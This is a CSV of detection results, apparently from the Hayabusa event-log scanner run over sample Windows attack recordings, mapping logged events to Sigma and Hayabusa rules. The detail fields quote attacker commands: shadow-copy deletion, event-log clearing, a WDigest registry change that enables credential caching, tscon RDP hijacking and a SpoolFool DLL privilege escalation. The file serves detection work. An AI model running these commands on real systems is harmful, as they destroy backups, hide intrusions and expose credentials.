2021-12-14 23:42:49.989 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x308fd50bf,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:50.007 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 127.0.0.1 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:50.008 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 127.0.0.1 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:50.008 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 127.0.0.1 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:50.031 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:50.033 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:50.046 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:50.049 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-18 07:44:18.475 +09:00,FS03.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1076,technique_name=Remote Desktop Protocol | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services | Process: C:\Windows\system32\reg.exe | PID: 2848 | PGUID: 7CF65FC7-12C2-61BD-EA04-000000001400",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0009-Collection/T1125-Video capture/ID13-RDP shadow session configuration enabled (registry).evtx
2021-12-19 23:33:08.147 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete Window backup (webadmin).evtx
2021-12-19 23:48:19.294 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (wmi).evtx
2021-12-19 23:48:21.231 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: wmic nteventlog where filename=""security"" cl | Path: C:\Windows\System32\wbem\WMIC.exe | PID: 0xff0 | User: admmig | LID: 0x542c77d",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (wmi).evtx
2021-12-19 23:51:04.020 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: wmic shadowcopy delete /nointeractive | Path: C:\Windows\System32\wbem\WMIC.exe | PID: 0x12c | User: admmig | LID: 0x542c77d,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete VSS backup (WMI).evtx
2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,low,Persis,Suspicious Get-WmiObject,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_gwmi.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx
2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,high,Impact,Delete Volume Shadow Copies via WMI with PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx
2022-01-07 07:27:21.255 +09:00,win10-02.offsec.lan,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1204-User execution/ID4688-Edge payload download via command.evtx
2022-01-08 07:05:06.936 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx
2022-01-08 07:05:07.640 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: /c whoami | Path: C:\Windows\System32\cmd.exe | PID: 0xd7c | User: FS03$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx
2022-01-08 07:05:07.640 +09:00,FS03.offsec.lan,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: admmig | Tgt User: test10 | IP Addr: - | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Svr: localhost,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx
2022-01-25 02:03:24.224 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
2022-01-25 02:03:25.002 +09:00,fs03vuln.offsec.lan,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: 3teamssixf$ | SID: S-1-5-21-2721507831-1374043488-2540227515-1008,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
2022-01-25 02:03:25.002 +09:00,fs03vuln.offsec.lan,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
2022-01-25 02:03:25.004 +09:00,fs03vuln.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-2721507831-1374043488-2540227515-1008 | Group: Administrators | LID: 0x14f509e2,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
2022-01-25 02:03:25.012 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: regedit /s .sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko.reg | Path: C:\Windows\regedit.exe | PID: 0x101c | User: admmig | LID: 0x14f509e2,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx
2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx
2022-01-26 18:20:49.101 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1112,technique_name=Modify Registry | Cmd: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 | Process: C:\Windows\System32\reg.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1586d8b2 | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000 | Hash: SHA1=0873F40DE395DE017495ED5C7E693AFB55E9F867,MD5=A3F446F1E2B8C6ECE56F608FB32B8DC6,SHA256=849F54DC526EA18D59ABAF4904CB11BC15B982D2952B971F2E1B6FBF8C974B39,IMPHASH=A069A88BBB8016324D7EC0A0EEC459EB",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx
2022-01-26 18:20:49.101 +09:00,fs03vuln.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | CreateKey: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest | Process: C:\Windows\system32\reg.exe | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx
2022-01-26 18:20:52.811 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | SetValue: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx
2022-01-26 18:20:52.811 +09:00,fs03vuln.offsec.lan,13,high,Evas,Wdigest Enable UseLogonCredential,,rules/sigma/registry_event/sysmon_wdigest_enable_uselogoncredential.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx
2022-02-09 05:33:15.159 +09:00,wef.windomain.local,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /k tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\cmd.exe | PID: 0x1980 | User: WEF$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx
2022-02-09 05:33:15.159 +09:00,wef.windomain.local,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd.exe /k tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\cmd.exe | PID: 0x1980 | User: WEF$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx
2022-02-09 05:33:15.166 +09:00,wef.windomain.local,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\tscon.exe | PID: 0x1b8c | User: WEF$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx
2022-02-16 19:37:07.251 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:19.637 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: 02694W-WIN10$ | Computer: - | IP Addr: 172.16.66.25 | LID: 0x567343,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: samir | Computer: 02694W-WIN10 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4672,info,,Admin Logon,User: samir | LID: 0x567515,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: samir | Computer: 02694W-WIN10 | IP Addr: 172.16.66.25 | LID: 0x567515,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.520 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: samir | Computer: 02694W-WIN10 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.521 +09:00,01566s-win16-ir.threebeesco.com,4672,info,,Admin Logon,User: samir | LID: 0x567758,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSAM | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSAM | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSYSTEM | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSYSTEM | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSECURITY | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSECURITY | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-20 02:35:16.207 +09:00,DESKTOP-TTEQ6PR,1,info,,Process Created,"Cmd: ""C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe"" -dll C:\ProgramData\Test.dll | Process: C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe | User: DESKTOP-TTEQ6PR\win10 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -noexit -command Set-Location -literalPath 'C:\Users\win10\Desktop\SpoolFool-main' | LID: 0x277ef | PID: 1232 | PGUID: 08DA6306-2A54-6211-0B01-000000001000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx
2022-02-20 02:35:16.207 +09:00,DESKTOP-TTEQ6PR,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx
2022-02-20 02:35:16.301 +09:00,DESKTOP-TTEQ6PR,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\4\Test.dll | Process: C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe | PID: 1232 | PGUID: 08DA6306-2A54-6211-0B01-000000001000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx
2022-02-20 02:35:16.301 +09:00,DESKTOP-TTEQ6PR,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx
2022-02-20 02:35:16.328 +09:00,DESKTOP-TTEQ6PR,7,info,Persis | Evas | PrivEsc,Windows Spooler Service Suspicious Binary Load,,rules/sigma/image_load/sysmon_spoolsv_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx